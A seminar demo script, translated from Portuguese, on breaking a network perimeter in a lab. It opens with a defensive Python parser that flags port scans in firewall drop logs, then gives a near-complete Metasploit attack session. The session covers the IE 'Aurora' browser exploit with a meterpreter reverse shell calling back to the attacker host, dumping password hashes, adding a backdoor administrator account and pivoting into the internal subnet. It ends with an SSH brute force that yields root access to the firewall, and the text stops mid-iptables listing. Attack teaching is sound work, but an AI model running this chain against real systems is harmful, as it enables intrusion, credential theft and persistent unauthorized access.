Script of the actions performed at the Estácio Information Security Seminar, in the presentation "Quebrando Perímetros de Redes" (Breaking Network Perimeters)
1- Run tests to check the firewall rules, using nmap and inspecting /var/log/messages. Also check remote access to the firewall
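Added example for step 1, written from the firewall operator's side (it is not part of the original script). The demo firewall's two LOG rules, shown later in the iptables -L listing, tag dropped packets with the prefixes `INPUT-DROP' and `FORWARD-DROP', so a port-scan test like the nmap run shows up in /var/log/messages as a burst of drops from one source against many destination ports. The script parses such lines and flags sources whose dropped attempts touched many distinct ports. The log lines are constructed for the example, the five-port threshold is an assumption, and the parser also accepts a prefix configured without a trailing space (as on this firewall), which the kernel then glues to the IN= field.

```python
import re
from collections import defaultdict

# Constructed sample /var/log/messages lines (not from the page), in the netfilter
# LOG format the demo firewall's rules produce. The first six imitate a scan from
# the outside host; note the prefix glued to "IN=" when it has no trailing space.
SAMPLE_MESSAGES = """\
Dec  4 09:41:02 ubuntu kernel: [  311.120] INPUT-DROPIN=eth0 OUT= MAC=00:0c:29:54:45:e8:00:0c:29:aa:bb:cc:08:00 SRC=172.16.49.200 DST=172.16.49.100 LEN=44 TOS=0x00 PREC=0x00 TTL=54 ID=1 PROTO=TCP SPT=40001 DPT=21 WINDOW=1024 RES=0x00 SYN URGP=0
Dec  4 09:41:02 ubuntu kernel: [  311.121] INPUT-DROPIN=eth0 OUT= MAC=00:0c:29:54:45:e8:00:0c:29:aa:bb:cc:08:00 SRC=172.16.49.200 DST=172.16.49.100 LEN=44 TOS=0x00 PREC=0x00 TTL=54 ID=2 PROTO=TCP SPT=40001 DPT=22 WINDOW=1024 RES=0x00 SYN URGP=0
Dec  4 09:41:02 ubuntu kernel: [  311.122] INPUT-DROPIN=eth0 OUT= MAC=00:0c:29:54:45:e8:00:0c:29:aa:bb:cc:08:00 SRC=172.16.49.200 DST=172.16.49.100 LEN=44 TOS=0x00 PREC=0x00 TTL=54 ID=3 PROTO=TCP SPT=40001 DPT=23 WINDOW=1024 RES=0x00 SYN URGP=0
Dec  4 09:41:02 ubuntu kernel: [  311.123] INPUT-DROPIN=eth0 OUT= MAC=00:0c:29:54:45:e8:00:0c:29:aa:bb:cc:08:00 SRC=172.16.49.200 DST=172.16.49.100 LEN=44 TOS=0x00 PREC=0x00 TTL=54 ID=4 PROTO=TCP SPT=40001 DPT=25 WINDOW=1024 RES=0x00 SYN URGP=0
Dec  4 09:41:03 ubuntu kernel: [  311.124] INPUT-DROPIN=eth0 OUT= MAC=00:0c:29:54:45:e8:00:0c:29:aa:bb:cc:08:00 SRC=172.16.49.200 DST=172.16.49.100 LEN=44 TOS=0x00 PREC=0x00 TTL=54 ID=5 PROTO=TCP SPT=40001 DPT=80 WINDOW=1024 RES=0x00 SYN URGP=0
Dec  4 09:41:03 ubuntu kernel: [  311.125] INPUT-DROPIN=eth0 OUT= MAC=00:0c:29:54:45:e8:00:0c:29:aa:bb:cc:08:00 SRC=172.16.49.200 DST=172.16.49.100 LEN=44 TOS=0x00 PREC=0x00 TTL=54 ID=6 PROTO=TCP SPT=40001 DPT=443 WINDOW=1024 RES=0x00 SYN URGP=0
Dec  4 09:45:10 ubuntu kernel: [  559.004] INPUT-DROP IN=eth0 OUT= MAC=00:0c:29:54:45:e8:00:0c:29:dd:ee:ff:08:00 SRC=172.16.49.50 DST=172.16.49.100 LEN=60 TOS=0x00 PREC=0x00 TTL=64 ID=7 PROTO=TCP SPT=51000 DPT=80 WINDOW=5840 RES=0x00 SYN URGP=0
Dec  4 09:45:11 ubuntu kernel: [  560.210] INPUT-DROP IN=eth0 OUT= MAC=00:0c:29:54:45:e8:00:0c:29:dd:ee:ff:08:00 SRC=172.16.49.50 DST=172.16.49.100 LEN=84 TOS=0x00 PREC=0x00 TTL=64 ID=8 PROTO=ICMP TYPE=8 CODE=0 ID=1 SEQ=1
Dec  4 10:58:40 ubuntu kernel: [ 4968.330] FORWARD-DROP IN=eth1 OUT=eth0 SRC=172.16.50.40 DST=172.16.49.200 LEN=48 TOS=0x00 PREC=0x00 TTL=127 ID=9 PROTO=TCP SPT=1040 DPT=22 WINDOW=65535 RES=0x00 SYN URGP=0
Dec  4 10:59:01 ubuntu sshd[1234]: Accepted password for root from 172.16.50.40 port 1050 ssh2
"""

# The \s* after the prefix tolerates both "INPUT-DROP IN=" and "INPUT-DROPIN=".
# SPT/DPT are optional because ICMP records carry TYPE/CODE instead.
LOG_RE = re.compile(
    r"(?P<prefix>INPUT-DROP|FORWARD-DROP)\s*IN=(?P<iface>\S*)\s.*?"
    r"SRC=(?P<src>\S+)\s+DST=(?P<dst>\S+)\s.*?PROTO=(?P<proto>\S+)"
    r"(?:\s+SPT=(?P<spt>\d+)\s+DPT=(?P<dpt>\d+))?"
)


def parse_drop_lines(text):
    """One record per netfilter LOG line; unrelated syslog lines are skipped."""
    records = []
    for line in text.splitlines():
        m = LOG_RE.search(line)
        if not m:
            continue
        records.append({
            "prefix": m.group("prefix"),
            "iface": m.group("iface"),
            "src": m.group("src"),
            "dst": m.group("dst"),
            "proto": m.group("proto"),
            "dpt": int(m.group("dpt")) if m.group("dpt") else None,
        })
    return records


def dropped_ports_by_source(records):
    """Map (source address, chain prefix) -> set of dropped destination ports."""
    ports = defaultdict(set)
    for r in records:
        if r["dpt"] is not None:
            ports[(r["src"], r["prefix"])].add(r["dpt"])
    return ports


def flag_port_scans(records, min_ports=5):
    """Sources whose dropped attempts hit at least min_ports distinct ports,
    returned as (src, prefix, distinct_port_count), sorted by source."""
    out = []
    for (src, prefix), dpts in sorted(dropped_ports_by_source(records).items()):
        if len(dpts) >= min_ports:
            out.append((src, prefix, len(dpts)))
    return out


if __name__ == "__main__":
    for src, chain, n in flag_port_scans(parse_drop_lines(SAMPLE_MESSAGES)):
        print(f"{src}: {n} distinct ports dropped in {chain}")
```

On a live box the same parser can be fed with `grep -e INPUT-DROP -e FORWARD-DROP /var/log/messages`; a single source touching many closed ports inside a short time is the signature to alert on, while one or two drops from a host are normal background noise.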
2- The attacker sets up a site hosting malware that uses the "aurora" exploit. The XP client visits the site and receives a Meterpreter payload. The client has to be convinced to click the link (social engineering or compromise of popular websites)
msf > search aurora
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/windows/browser/ms10_002_aurora 2010-01-14 normal Internet Explorer "Aurora" Memory Corruption
msf > use exploit/windows/browser/ms10_002_aurora
msf exploit(ms10_002_aurora) > show options
Module options (exploit/windows/browser/ms10_002_aurora):
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
URIPATH no The URI to use for this exploit (default is random)
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(ms10_002_aurora) > set SRVPORT 80
SRVPORT => 80
msf exploit(ms10_002_aurora) > set PAYLOAD
set PAYLOAD generic/custom set PAYLOAD windows/patchupmeterpreter/bind_nonx_tcp
set PAYLOAD generic/debug_trap set PAYLOAD windows/patchupmeterpreter/bind_tcp
set PAYLOAD generic/shell_bind_tcp set PAYLOAD windows/patchupmeterpreter/reverse_ipv6_tcp
set PAYLOAD generic/shell_reverse_tcp set PAYLOAD windows/patchupmeterpreter/reverse_nonx_tcp
set PAYLOAD generic/tight_loop set PAYLOAD windows/patchupmeterpreter/reverse_ord_tcp
set PAYLOAD windows/dllinject/bind_ipv6_tcp set PAYLOAD windows/patchupmeterpreter/reverse_tcp
set PAYLOAD windows/dllinject/bind_nonx_tcp set PAYLOAD windows/patchupmeterpreter/reverse_tcp_allports
set PAYLOAD windows/dllinject/bind_tcp set PAYLOAD windows/patchupmeterpreter/reverse_tcp_dns
set PAYLOAD windows/dllinject/reverse_http set PAYLOAD windows/shell/bind_ipv6_tcp
set PAYLOAD windows/dllinject/reverse_ipv6_tcp set PAYLOAD windows/shell/bind_nonx_tcp
set PAYLOAD windows/dllinject/reverse_nonx_tcp set PAYLOAD windows/shell/bind_tcp
set PAYLOAD windows/dllinject/reverse_ord_tcp set PAYLOAD windows/shell/reverse_http
set PAYLOAD windows/dllinject/reverse_tcp set PAYLOAD windows/shell/reverse_ipv6_tcp
set PAYLOAD windows/dllinject/reverse_tcp_allports set PAYLOAD windows/shell/reverse_nonx_tcp
set PAYLOAD windows/dllinject/reverse_tcp_dns set PAYLOAD windows/shell/reverse_ord_tcp
set PAYLOAD windows/download_exec set PAYLOAD windows/shell/reverse_tcp
set PAYLOAD windows/exec set PAYLOAD windows/shell/reverse_tcp_allports
set PAYLOAD windows/loadlibrary set PAYLOAD windows/shell/reverse_tcp_dns
set PAYLOAD windows/messagebox set PAYLOAD windows/shell_bind_tcp
set PAYLOAD windows/meterpreter/bind_ipv6_tcp set PAYLOAD windows/shell_bind_tcp_xpfw
set PAYLOAD windows/meterpreter/bind_nonx_tcp set PAYLOAD windows/shell_reverse_tcp
set PAYLOAD windows/meterpreter/bind_tcp set PAYLOAD windows/speak_pwned
set PAYLOAD windows/meterpreter/reverse_http set PAYLOAD windows/upexec/bind_ipv6_tcp
set PAYLOAD windows/meterpreter/reverse_https set PAYLOAD windows/upexec/bind_nonx_tcp
set PAYLOAD windows/meterpreter/reverse_ipv6_tcp set PAYLOAD windows/upexec/bind_tcp
set PAYLOAD windows/meterpreter/reverse_nonx_tcp set PAYLOAD windows/upexec/reverse_http
set PAYLOAD windows/meterpreter/reverse_ord_tcp set PAYLOAD windows/upexec/reverse_ipv6_tcp
set PAYLOAD windows/meterpreter/reverse_tcp set PAYLOAD windows/upexec/reverse_nonx_tcp
set PAYLOAD windows/meterpreter/reverse_tcp_allports set PAYLOAD windows/upexec/reverse_ord_tcp
set PAYLOAD windows/meterpreter/reverse_tcp_dns set PAYLOAD windows/upexec/reverse_tcp
set PAYLOAD windows/metsvc_bind_tcp set PAYLOAD windows/upexec/reverse_tcp_allports
set PAYLOAD windows/metsvc_reverse_tcp set PAYLOAD windows/upexec/reverse_tcp_dns
set PAYLOAD windows/patchupdllinject/bind_ipv6_tcp set PAYLOAD windows/vncinject/bind_ipv6_tcp
set PAYLOAD windows/patchupdllinject/bind_nonx_tcp set PAYLOAD windows/vncinject/bind_nonx_tcp
set PAYLOAD windows/patchupdllinject/bind_tcp set PAYLOAD windows/vncinject/bind_tcp
set PAYLOAD windows/patchupdllinject/reverse_ipv6_tcp set PAYLOAD windows/vncinject/reverse_http
set PAYLOAD windows/patchupdllinject/reverse_nonx_tcp set PAYLOAD windows/vncinject/reverse_ipv6_tcp
set PAYLOAD windows/patchupdllinject/reverse_ord_tcp set PAYLOAD windows/vncinject/reverse_nonx_tcp
--More--
msf exploit(ms10_002_aurora) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ms10_002_aurora) > show options
Module options (exploit/windows/browser/ms10_002_aurora):
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 80 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
URIPATH no The URI to use for this exploit (default is random)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique: seh, thread, process, none
LHOST yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(ms10_002_aurora) > set LHOST 172.16.49.200
LHOST => 172.16.49.200
msf exploit(ms10_002_aurora) > set LPORT 443
LPORT => 443
msf exploit(ms10_002_aurora) > exploit
[*] Exploit running as background job.
[*] Started reverse handler on 172.16.49.200:443
[*] Using URL: http://0.0.0.0:80/5ogRS19
[*] Local IP: http://172.16.49.200:80/5ogRS19
[*] Server started.
msf exploit(ms10_002_aurora) > [*] Sending Internet Explorer "Aurora" Memory Corruption to client 172.16.50.40
[*] Sending stage (752128 bytes) to 172.16.50.40
[*] Meterpreter session 1 opened (172.16.49.200:443 -> 172.16.50.40:1032) at 2011-12-04 10:02:41 -0200
msf exploit(ms10_002_aurora) > sessions -l
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x86/win32 CLIENT125\Administrator @ CLIENT125 172.16.49.200:443 -> 172.16.50.40:1032
msf exploit(ms10_002_aurora) >
3- Attacker on the XP client: sniffs traffic, uploads plink, runs hashdump, checks the IP address and processes, and escalates privileges (enables the GUI)
meterpreter > migrate 516
[*] Migrating to 516...
[*] Migration completed successfully.
meterpreter >
meterpreter > getpid
Current pid: 516
meterpreter > upload -h
Usage: upload [options] src1 src2 src3 ... destination
Uploads local files and directories to the remote machine.
OPTIONS:
-h Help banner.
-r Upload recursively.
meterpreter > upload /pentest/windows-binaries/tools/plink.exe c:\\
[*] uploading : /pentest/windows-binaries/tools/plink.exe -> c:\
[*] uploaded : /pentest/windows-binaries/tools/plink.exe -> c:\\plink.exe
meterpreter > cd c:\
meterpreter > pwd
c:\
meterpreter > ls
Listing: c:\
============
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100444/r--r--r-- 211 fil 2007-10-31 22:10:02 -0200 boot.ini
100444/r--r--r-- 0 fil 2007-01-10 15:47:18 -0200 MSDOS.SYS
100444/r--r--r-- 0 fil 2007-01-10 15:47:18 -0200 IO.SYS
100444/r--r--r-- 250032 fil 2007-06-04 03:17:32 -0300 ntldr
100555/r-xr-xr-x 47564 fil 2007-06-04 03:17:32 -0300 NTDETECT.COM
100666/rw-rw-rw- 0 fil 2007-01-10 15:47:18 -0200 CONFIG.SYS
100666/rw-rw-rw- 603168768 fil 2011-12-04 09:40:33 -0200 pagefile.sys
100666/rw-rw-rw- 1024 fil 2007-05-10 05:17:55 -0300 .rnd
100777/rwxrwxrwx 0 fil 2007-01-10 15:47:18 -0200 AUTOEXEC.BAT
100777/rwxrwxrwx 229376 fil 2011-12-04 10:08:51 -0200 plink.exe
40555/r-xr-xr-x 0 dir 2009-07-21 19:28:52 -0300 Program Files
40777/rwxrwxrwx 0 dir 2007-10-24 22:06:10 -0200 found.000
40777/rwxrwxrwx 0 dir 2007-06-04 03:24:26 -0300 System Volume Information
40777/rwxrwxrwx 0 dir 2011-12-01 16:32:51 -0200 WINDOWS
40777/rwxrwxrwx 0 dir 2007-12-20 00:03:49 -0200 abilitywebserver
40777/rwxrwxrwx 0 dir 2007-03-22 15:51:15 -0300 Perl
40777/rwxrwxrwx 0 dir 2007-03-22 15:52:08 -0300 Python25
40777/rwxrwxrwx 0 dir 2007-10-31 21:31:05 -0200 found.001
40777/rwxrwxrwx 0 dir 2007-06-04 00:40:48 -0300 install
40777/rwxrwxrwx 0 dir 2011-08-05 20:27:02 -0300 Documents and Settings
40777/rwxrwxrwx 0 dir 2009-07-21 19:32:08 -0300 Config.Msi
40777/rwxrwxrwx 0 dir 2007-01-10 11:51:19 -0200 RECYCLER
meterpreter > hashdump
Administrator:500:xxxx8fca1932ced5aad3b435b514xxxx:xxxxa5b26e6d1da1d7d96f38387bxxxx:::
cassio:1004:xxxx8fca1932ced5aad3b435b514xxxx:xxxxa5b26e6d1da1d7d96f38387bxxxx:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:05fa67eaec4d789ec4bd52f48e5a6b28:2733cdb0d8a1fec3f976f3b8ad1deeef:::
offsec:1003:7bf4f254b222bb24aad3b435b51404ee:2892d26cdf84d7a70e2eb3b9f05c425e:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:0f7a50dd4b95cec4c1dea566f820f4e7:::
meterpreter >
meterpreter >
c:\> net user hacker hacker /add
c:\> net localgroup administrators hacker /add
4- Attacker pivots through the XP host and runs an ARP scan and a port scan, discovering an Ubuntu host and a Windows 2003 host with their respective services
meterpreter > background
msf exploit(ms10_002_aurora) > sessions -l
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x86/win32 CLIENT125\Administrator @ CLIENT125 172.16.49.200:443 -> 172.16.50.40:1032
msf exploit(ms10_002_aurora) > route add 172.16.50.0 255.255.255.0 1
[*] Route added
msf exploit(ms10_002_aurora) > route print
Active Routing Table
====================
Subnet Netmask Gateway
------ ------- -------
172.16.50.0 255.255.255.0 Session 1
msf exploit(ms10_002_aurora) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > run arp_scanner -r 172.16.50.0/24
[*] ARP Scanning 172.16.50.0/24
[*] IP: 172.16.50.1 MAC 00:0c:29:54:45:f2
[*] IP: 172.16.50.40 MAC 00:0c:29:0a:57:88
meterpreter > run arp_scanner -r 172.16.50.0/24
[*] ARP Scanning 172.16.50.0/24
[*] IP: 172.16.50.1 MAC 00:0c:29:54:45:f2
[*] IP: 172.16.50.30 MAC 00:0c:29:89:a1:d8
[*] IP: 172.16.50.40 MAC 00:0c:29:0a:57:88
^Cmeterpreter >
meterpreter > back
[-] Unknown command: back.
meterpreter > background
msf exploit(ms10_002_aurora) > use auxiliary/scanner/po
use auxiliary/scanner/pop3/pop3_login
use auxiliary/scanner/pop3/pop3_version
use auxiliary/scanner/portscan/ack
use auxiliary/scanner/portscan/ftpbounce
use auxiliary/scanner/portscan/syn
use auxiliary/scanner/portscan/tcp
use auxiliary/scanner/portscan/xmas
use auxiliary/scanner/postgres/postgres_hashdump
use auxiliary/scanner/postgres/postgres_login
use auxiliary/scanner/postgres/postgres_version
msf exploit(ms10_002_aurora) > use auxiliary/scanner/portscan/tcp
msf auxiliary(tcp) > show options
Module options (auxiliary/scanner/portscan/tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
CONCURRENCY 10 yes The number of concurrent ports to check per host
FILTER no The filter string for capturing traffic
INTERFACE no The name of the interface
PCAPFILE no The name of the PCAP capture file to process
PORTS 1-10000 yes Ports to scan (e.g. 22-25,80,110-900)
RHOSTS yes The target address range or CIDR identifier
SNAPLEN 65535 yes The number of bytes to capture
THREADS 1 yes The number of concurrent threads
TIMEOUT 1000 yes The socket connect timeout in milliseconds
msf auxiliary(tcp) > set ports 1-100
ports => 1-100
msf auxiliary(tcp) > set rhosts 172.16.50.1
rhosts => 172.16.50.1
msf auxiliary(tcp) > run
[*] 172.16.50.1:22 - TCP OPEN
^C[*] Caught interrupt from the console...
[*] Auxiliary module execution completed
msf auxiliary(tcp) > unset ports
Unsetting ports...
msf auxiliary(tcp) > set ports 1-500
ports => 1-500
msf auxiliary(tcp) > unset rhosts
Unsetting rhosts...
msf auxiliary(tcp) > set rhosts 172.16.50.30
rhosts => 172.16.50.30
msf auxiliary(tcp) > run
[*] 172.16.50.30:53 - TCP OPEN
[*] 172.16.50.30:139 - TCP OPEN
[*] 172.16.50.30:135 - TCP OPEN
[*] 172.16.50.30:445 - TCP OPEN
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(tcp) >
5- Attacker brute-forces (through a port forward) with hydra, discovers the password and uses plink
msf auxiliary(tcp) > back
msf > search ssh
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/fuzzers/ssh/ssh_kexinit_corrupt normal SSH Key Exchange Init Corruption
auxiliary/fuzzers/ssh/ssh_version_15 normal SSH 1.5 Version Fuzzer
auxiliary/fuzzers/ssh/ssh_version_2 normal SSH 2.0 Version Fuzzer
auxiliary/fuzzers/ssh/ssh_version_corrupt normal SSH Version Corruption
auxiliary/scanner/ssh/ssh_login normal SSH Login Check Scanner
auxiliary/scanner/ssh/ssh_login_pubkey normal SSH Public Key Login Scanner
auxiliary/scanner/ssh/ssh_version normal SSH Version Scanner
exploit/windows/ssh/freeftpd_key_exchange 2006-05-12 average FreeFTPd 1.0.10 Key Exchange Algorithm String Buffer Overflow
exploit/windows/ssh/freesshd_key_exchange 2006-05-12 average FreeSSHd 1.0.9 Key Exchange Algorithm String Buffer Overflow
exploit/windows/ssh/putty_msg_debug 2002-12-16 normal PuTTy.exe <= v0.53 Buffer Overflow
exploit/windows/ssh/securecrt_ssh1 2002-07-23 average SecureCRT <= 4.0 Beta 2 SSH1 Buffer Overflow
post/multi/gather/ssh_creds normal Multi Gather OpenSSH PKI Credentials Collection
post/windows/gather/credentials/mremote normal Windows Gather mRemote Saved Password Extraction
msf > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(ssh_login) > show options
Module options (auxiliary/scanner/ssh/ssh_login):
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS true no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
PASSWORD no A specific password to authenticate with
PASS_FILE no File containing passwords, one per line
RHOSTS yes The target address range or CIDR identifier
RPORT 22 yes The target port
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads
USERNAME no A specific username to authenticate as
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
USER_AS_PASS true no Try the username as the password for all users
USER_FILE no File containing usernames, one per line
VERBOSE true yes Whether to print output for all attempts
msf auxiliary(ssh_login) > set RHOSTS 172.16.50.1
RHOSTS => 172.16.50.1
msf auxiliary(ssh_login) > set USERNAME root
USERNAME => root
msf auxiliary(ssh_login) > set PASS_FILE /root/
.ICEauthority .gtk-recordmydesktop .subversion
.TrueCrypt .gvfs .thumbnails
.Xauthority .i2p .viminfo
.adobe .local .w3m
.aptitude .macromedia .wine
.armitage.prop .maltego .wireshark
.bash_history .mozilla .xchat2
.bashrc .mplayer .xsession-errors
.cache .msf3 Desktop
.config .msf4 FirePassword.zip
.dbus .nautilus a.out
.debtags .netbeans arq_dicionario.txt
.esd_auth .profile backdoor.exe
.gconf .pulse cassio
.gconfd .pulse-cookie cassio_orog.txt
.gem .purple dcom.c
.gnome2 .recently-used.xbel dhcpstarv-0.2.1
.gnome2_private .rnd resumo.tar.gz
.gstreamer-0.10 .selected_editor teste.arquivodocassio
.gtk-bookmarks .ssh
msf auxiliary(ssh_login) > set PASS_FILE /root/arq_dicionario.txt
PASS_FILE => /root/arq_dicionario.txt
msf auxiliary(ssh_login) > run
[*] 172.16.50.1:22 SSH - Starting bruteforce
[*] 172.16.50.1:22 SSH - [01/16] - Trying: username: 'root' with password: ''
[-] 172.16.50.1:22 SSH - [01/16] - Failed: 'root':''
[*] 172.16.50.1:22 SSH - [02/16] - Trying: username: 'root' with password: 'root'
[-] 172.16.50.1:22 SSH - [02/16] - Failed: 'root':'root'
[*] 172.16.50.1:22 SSH - [03/16] - Trying: username: 'root' with password: '#!comment: This list has been compiled by Solar Designer of Openwall Project,'
[-] 172.16.50.1:22 SSH - [03/16] - Failed: 'root':'#!comment: This list has been compiled by Solar Designer of Openwall Project,'
[*] 172.16.50.1:22 SSH - [04/16] - Trying: username: 'root' with password: '#!comment: http://www.openwall.com/wordlists/'
[-] 172.16.50.1:22 SSH - [04/16] - Failed: 'root':'#!comment: http://www.openwall.com/wordlists/'
[*] 172.16.50.1:22 SSH - [05/16] - Trying: username: 'root' with password: '#!comment:'
[-] 172.16.50.1:22 SSH - [05/16] - Failed: 'root':'#!comment:'
[*] 172.16.50.1:22 SSH - [06/16] - Trying: username: 'root' with password: '#!comment: This list is based on passwords most commonly seen on a set of Unix'
[-] 172.16.50.1:22 SSH - [06/16] - Failed: 'root':'#!comment: This list is based on passwords most commonly seen on a set of Unix'
[*] 172.16.50.1:22 SSH - [07/16] - Trying: username: 'root' with password: '#!comment: systems in mid-1990's, sorted for decreasing number of occurrences'
[-] 172.16.50.1:22 SSH - [07/16] - Failed: 'root':'#!comment: systems in mid-1990's, sorted for decreasing number of occurrences'
[*] 172.16.50.1:22 SSH - [08/16] - Trying: username: 'root' with password: '#!comment: (that is, more common passwords are listed first). It has been'
[-] 172.16.50.1:22 SSH - [08/16] - Failed: 'root':'#!comment: (that is, more common passwords are listed first). It has been'
[*] 172.16.50.1:22 SSH - [09/16] - Trying: username: 'root' with password: '#!comment: revised to also include common website passwords from public lists'
[-] 172.16.50.1:22 SSH - [09/16] - Failed: 'root':'#!comment: revised to also include common website passwords from public lists'
[*] 172.16.50.1:22 SSH - [10/16] - Trying: username: 'root' with password: '#!comment: of "top N passwords" from major community website compromises that'
[-] 172.16.50.1:22 SSH - [10/16] - Failed: 'root':'#!comment: of "top N passwords" from major community website compromises that'
[*] 172.16.50.1:22 SSH - [11/16] - Trying: username: 'root' with password: '#!comment: occurred in 2006 through 2009.'
[-] 172.16.50.1:22 SSH - [11/16] - Failed: 'root':'#!comment: occurred in 2006 through 2009.'
[*] 172.16.50.1:22 SSH - [12/16] - Trying: username: 'root' with password: '#!comment: Last update: 2010/01/11 (3158 entries)'
[-] 172.16.50.1:22 SSH - [12/16] - Failed: 'root':'#!comment: Last update: 2010/01/11 (3158 entries)'
[*] 172.16.50.1:22 SSH - [13/16] - Trying: username: 'root' with password: '12345'
[-] 172.16.50.1:22 SSH - [13/16] - Failed: 'root':'12345'
[*] 172.16.50.1:22 SSH - [14/16] - Trying: username: 'root' with password: 'abc123'
[-] 172.16.50.1:22 SSH - [14/16] - Failed: 'root':'abc123'
[*] 172.16.50.1:22 SSH - [15/16] - Trying: username: 'root' with password: 'password'
[*] Command shell session 2 opened (172.16.49.200-172.16.50.40:0 -> 172.16.50.1:22) at 2011-12-04 10:30:13 -0200
[+] 172.16.50.1:22 SSH - [15/16] - Success: 'root':'password' 'uid=0(root) gid=0(root) groups=0(root) Linux ubuntu 2.6.35-22-generic #35-Ubuntu SMP Sat Oct 16 20:36:48 UTC 2010 i686 GNU/Linux '
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ssh_login) > back
msf > sessions -l
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x86/win32 CLIENT125\Administrator @ CLIENT125 172.16.49.200:443 -> 172.16.50.40:1032
2 shell linux SSH root:password (172.16.50.1:22) 172.16.49.200-172.16.50.40:0 -> 172.16.50.1:22
msf >
msf > sessions -l
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x86/win32 CLIENT125\Administrator @ CLIENT125 172.16.49.200:443 -> 172.16.50.40:1032
2 shell linux SSH root:password (172.16.50.1:22) 172.16.49.200-172.16.50.40:0 -> 172.16.50.1:22
msf > sessions -i 1
[*] Starting interaction with 1...
meterpreter > shell
Process 1004 created.
Channel 22 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
c:\>dir
dir
Volume in drive C has no label.
Volume Serial Number is 28BF-EFA1
Directory of c:\
05/10/2007 10:17 AM 1,024 .rnd
12/20/2007 04:03 AM <DIR> abilitywebserver
01/10/2007 07:47 PM 0 AUTOEXEC.BAT
01/10/2007 07:47 PM 0 CONFIG.SYS
08/06/2011 01:27 AM <DIR> Documents and Settings
06/04/2007 05:40 AM <DIR> install
03/22/2007 08:51 PM <DIR> Perl
12/04/2011 02:08 PM 229,376 plink.exe
07/22/2009 12:28 AM <DIR> Program Files
03/22/2007 08:52 PM <DIR> Python25
12/01/2011 08:32 PM <DIR> WINDOWS
4 File(s) 230,400 bytes
7 Dir(s) 866,496,512 bytes free
c:\>plink.exe -l root -pw password 172.16.50.1
plink.exe -l root -pw password 172.16.50.1
Linux ubuntu 2.6.35-22-generic #35-Ubuntu SMP Sat Oct 16 20:36:48 UTC 2010 i686 GNU/Linux
Ubuntu 10.10
Welcome to Ubuntu!
* Documentation: https://help.ubuntu.com/
310 packages can be updated.
179 updates are security updates.
New release 'natty' available.
Run 'do-release-upgrade' to upgrade to it.
Last login: Sun Dec 4 04:21:31 2011 from localhost.localdomain
root@ubuntu:~# whoami
whoami
root
root@ubuntu:~# ifconfig
ifconfig
eth0 Link encap:Ethernet HWaddr 00:0c:29:54:45:e8
inet addr:172.16.49.100 Bcast:172.16.49.255 Mask:255.255.255.0
inet6 addr: fe80::20c:29ff:fe54:45e8/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:23370 errors:0 dropped:0 overruns:0 frame:0
TX packets:8784 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:17677711 (17.6 MB) TX bytes:1879700 (1.8 MB)
Interrupt:19 Base address:0x2000
eth1 Link encap:Ethernet HWaddr 00:0c:29:54:45:f2
inet addr:172.16.50.1 Bcast:172.16.50.255 Mask:255.255.255.0
inet6 addr: fe80::20c:29ff:fe54:45f2/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:12371 errors:0 dropped:0 overruns:0 frame:0
TX packets:19081 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:2419075 (2.4 MB) TX bytes:17128185 (17.1 MB)
Interrupt:19 Base address:0x2080
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:120 errors:0 dropped:0 overruns:0 frame:0
TX packets:120 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:15232 (15.2 KB) TX bytes:15232 (15.2 KB)
root@ubuntu:~# iptables -L
iptables -L
Chain INPUT (policy DROP)
target prot opt source destination
ACCEPT all -- anywhere anywhere
ACCEPT all -- anywhere anywhere state RELATED,ESTABLISHED
ACCEPT tcp -- 172.16.50.0/24 anywhere tcp dpt:ssh
